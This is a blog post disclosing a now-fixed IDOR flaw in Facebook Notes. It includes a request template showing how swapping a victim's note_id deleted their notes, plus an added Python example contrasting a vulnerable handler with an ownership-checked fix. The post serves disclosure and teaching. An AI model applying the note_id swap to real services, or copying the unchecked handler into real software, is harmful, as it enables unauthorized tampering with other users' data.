Sunday, 13 December 2015

[Responsible disclosure] How I could have removed all your Facebook notes

Note: This is being published with the permission of Facebook under the responsible disclosure policy. The vulnerability is now fixed.

Summary:

This blog post is about an Insecure Direct Object Reference (IDOR) vulnerability in Facebook Notes. An attacker could have removed all of your notes simply by replacing his own note id with yours in the note-editing request.


About Facebook Notes:

Facebook Notes are ways of writing entries about your life, your thoughts, or your all-time favorite songs and then sharing them with your Facebook friends. The beauty of Notes lies in the ability to blog without needing to distribute a web address to friends so that they can go check out your blog. Instead, your friends are connected to your Profile. Therefore, when you publish a Note, it appears in your News Feed.


Vulnerability description: 

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter that points to an object. Such resources can be database entries belonging to other users, files in the system, and more. The root cause is that the application takes user-supplied input and uses it to retrieve an object without performing sufficient authorization checks.

Reference:  https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References


Vulnerable request:

POST /a/note.php?note_id=[victim’s note id]&publish&gfid=[attacker’s token]
Host: touch.facebook.com

fb_dtsg=[attacker’s token]&charset_test=&title=&body=&privacy=&=Publish&_dyn=&__user=[attacker’s userID]

Replacing note_id in the above request with the victim's note id led to successful removal of the note from the victim's account, even though the fb_dtsg token and __user value belonged to the attacker. The note id can be seen by visiting the victim's note and copying the id from the URL.
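To make the authorization gap concrete, here is an added example (not Facebook's code) modelling the note-editing endpoint above: the vulnerable handler fetches the note purely by the client-supplied note_id, while the fixed handler also requires that the note's owner match the authenticated user. All user ids, note ids and the in-memory store are constructed for the example.

```python
# Added example (not Facebook's code): an IDOR on a note-editing endpoint,
# modelled on the note_id / __user parameters above. Data below is constructed.
from dataclasses import dataclass

@dataclass
class Note:
    note_id: int
    owner_id: int
    body: str

# Constructed sample data: user 100 is the victim, user 200 the attacker.
NOTES = {
    501: Note(501, 100, "victim's note"),
    502: Note(502, 200, "attacker's own note"),
}

class Forbidden(Exception):
    """Raised when the caller does not own the object it is trying to edit."""

def edit_note_vulnerable(store, session_user, note_id, body):
    """Trusts note_id from the request and never compares it with session_user."""
    note = store[note_id]          # object fetched purely by client-supplied id
    note.body = body               # publishing an empty body over it wipes the note
    return note

def edit_note_fixed(store, session_user, note_id, body):
    """Same operation, but the object's owner must match the authenticated user."""
    note = store.get(note_id)
    # One error for both 'missing' and 'not yours', so ids cannot be enumerated.
    if note is None or note.owner_id != session_user:
        raise Forbidden("note not found or not owned by the requesting user")
    note.body = body
    return note

def demo():
    """Replays the cross-user edit against both handlers; returns (vuln_changed, fixed_blocked)."""
    vuln_store = {k: Note(v.note_id, v.owner_id, v.body) for k, v in NOTES.items()}
    fixed_store = {k: Note(v.note_id, v.owner_id, v.body) for k, v in NOTES.items()}
    # Attacker session (200) submits the victim's note_id (501) with an empty body.
    edit_note_vulnerable(vuln_store, session_user=200, note_id=501, body="")
    vuln_changed = vuln_store[501].body == ""
    try:
        edit_note_fixed(fixed_store, session_user=200, note_id=501, body="")
        fixed_blocked = False
    except Forbidden:
        fixed_blocked = fixed_store[501].body == "victim's note"
    return vuln_changed, fixed_blocked

if __name__ == "__main__":
    print(demo())
```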



Video POC:

Impact:

Note deletion from victim's account



Disclosure Timeline:

June 15, 2015 : Report sent to Facebook Security team
June 16, 2015 : Bug acknowledged by Facebook Security team
June 16, 2015 : Vulnerability Fixed
June 22, 2015 : Bounty of $2500 awarded by Facebook






29 comments:

  1. Reading works of white hat hackers really inspires me to work in the field of ethical hacking, but how to proceed is the question that blocks my way :(